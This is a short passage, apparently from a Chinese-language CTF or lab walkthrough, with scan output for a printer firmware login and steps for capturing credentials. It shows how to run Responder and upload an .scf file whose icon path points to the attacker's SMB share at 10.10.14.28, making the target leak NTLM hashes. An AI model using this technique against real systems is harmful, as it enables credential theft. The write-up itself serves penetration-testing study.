httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\\x0D
|\_ Basic realm=MFP Firmware Update Center..._||| \_) (/\_(\_|| (\_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json...思来想去没结果,google了一下MFP Firmware Update Center exploit
实际上这里是和smb结合起来使用的,首先先使用Responder本地监听起来
python2 Responder.py...--lm -v -I tun0 这里-I后面跟的是网卡的名字
然后再上传一个xxx.scf文件,内容为
[Shell]
Command=2
IconFile=\\10.10.14.28\share...\pentestlab.ico
# 其中的ip写监听者的ip,也就是攻击机的ip
[Taskbar]
Command=ToggleDesktop
接下来就是等待后台在共享目录中访问该文件